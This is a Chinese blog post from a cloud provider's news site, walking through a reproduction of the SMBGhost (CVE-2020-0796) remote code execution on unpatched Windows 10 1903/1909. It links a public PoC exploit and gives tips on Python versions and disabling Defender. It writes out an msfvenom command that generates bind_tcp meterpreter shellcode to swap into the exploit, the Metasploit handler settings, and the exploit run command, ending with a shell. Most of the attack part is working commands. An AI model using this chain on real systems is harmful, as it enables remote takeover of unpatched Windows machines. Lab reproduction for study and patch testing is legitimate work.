温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

怎么解析CVE-2020-0796 RCE漏洞

发布时间:2021-12-28 17:26:41 来源:亿速云 阅读:140 作者:柒染 栏目:安全技术

这期内容当中小编将会给大家带来有关怎么解析CVE-2020-0796 RCE漏洞,文章内容丰富且以专业的角度为大家分析和叙述,阅读完这篇文章希望大家可以有所收获。

漏洞介绍

微软SMBv3 Client/Server远程代码执行漏洞CVE-2020-0796

影响范围:
Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server, Version 1903 (Server Core installation)
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server, Version 1909 (Server Core installation)

复现坑点:坑点比较多看一下

EXP地址:

https://github.com/chompie1337/SMBGhost_RCE_PoC

  • Win10 版本有限制,具体我自己用的下面这个成功的

下载地址

  • python 版本

python 3.6 可以成功!

python 3.6 可以成功!

python 3.7 和 2 实测蓝屏

不懂为啥,有大佬知道可以指导一下弟弟

  • payload要正向监听

  • 补丁也有坑,KB4551762讲道理是没有,但是win10的补丁,看见就那几个,但是那个补丁里面可能有包含这个补丁

  • 需要关闭defender防火墙

复现过程

首先使用systeminfo看一下补丁(KB4551762)

我新装的,肯定没啥问题,

  • msf生成木马

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python

怎么解析CVE-2020-0796 RCE漏洞

EXP替换shellcode

把buf 替换成USER_PAYLOAD

怎么解析CVE-2020-0796 RCE漏洞

use exploit/multi/handler 
set payload windows/x64/meterpreter/bind_tcp
set lport 6666
set rhost 192.168.31.235
run

怎么解析CVE-2020-0796 RCE漏洞怎么解析CVE-2020-0796 RCE漏洞运行EXP

python3 exploit.py -ip 192.168.100.54

怎么解析CVE-2020-0796 RCE漏洞

最终拿到shell

怎么解析CVE-2020-0796 RCE漏洞

上述就是小编为大家分享的怎么解析CVE-2020-0796 RCE漏洞了,如果刚好有类似的疑惑,不妨参照上述分析进行理解。如果想知道更多相关知识,欢迎关注亿速云行业资讯频道。

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI